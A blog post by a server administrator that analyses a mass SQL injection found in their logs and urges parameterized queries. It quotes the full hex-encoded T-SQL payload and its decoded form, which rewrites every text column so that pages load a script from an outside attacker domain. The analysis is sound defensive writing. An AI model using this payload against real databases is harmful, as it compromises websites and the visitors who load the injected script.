SQL Injection Attacks Still Common

Once a while, I would comb through my server logs to see i there is any unusual activities. Among all types of "attacks" that I could identify within my server logs, It seems that SQL injection attacks are still the most common type of attack.

The latest wave of such attack looks like follows:

?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452040
54207661726368617228323535292C4043207661726368617228343030302920
4445434C415245205461626C655F437572736F7220435552534F5220464F5220
73656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626
A6563747320612C737973636F6C756D6E73206220776865726520612E69643D
622E696420616E6420612E78747970653D27752720616E642028622E7874797
0653D3939206F7220622E78747970653D3335206F7220622E78747970653D32
3331206F7220622E78747970653D31363729204F50454E205461626C655F437
572736F72204645544348204E4558542046524F4D20205461626C655F437572
736F7220494E544F2040542C4043205748494C4528404046455443485F53544
15455533D302920424547494E20657865632827757064617465205B272B4054
2B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C73
6372697074207372633D22687474703A2F2F777777332E73733131716E2E636
E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D2727
2B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B652
0272725223E3C2F7469746C653E3C736372697074207372633D22687474703A
2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E
3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4
D20205461626C655F437572736F7220494E544F2040542C404320454E442043
4C4F5345205461626C655F437572736F72204445414C4C4F434154452054616
26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

 

The technique used by the attacker is extremely simple. It basically generates a dynamic SQL statement (HEX encoded, many converters like this one can be used to translate the HEX code back to ASCII):

DECLARE @T varchar(255)’@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name’b.name from sysobjects a’syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T’@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=”"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!–”+[‘+@C+’] where ‘+@C+’ not like ”%"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!–”’)FETCH NEXT FROM  Table_Cursor INTO @T’@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 

The above SQL code creates a list of all the text columns in the current database and tries to insert the highlighted scripts. The script tries to "infect" entries that have not already been changed so that would presumably be less suspicious.

The following google search:

http://www.google.com/search?hl=en&q=http%3A%2F%2Fwww0.douhunqn.cn%2Fcsrss%2Fw.js&btnG=Search

revealed that there were a large number of sites that have been affected. This is quite striking since SQL injection attacks have been around for a long time and simple techniques (e.g. stored procedures, parameterized queries, escape special characters) can prevent such exploit. But it is apparent that there are still many people there embed SQL statements in their code without taking any precautions…

Be Sociable, Share!

One Comment

Leave a Reply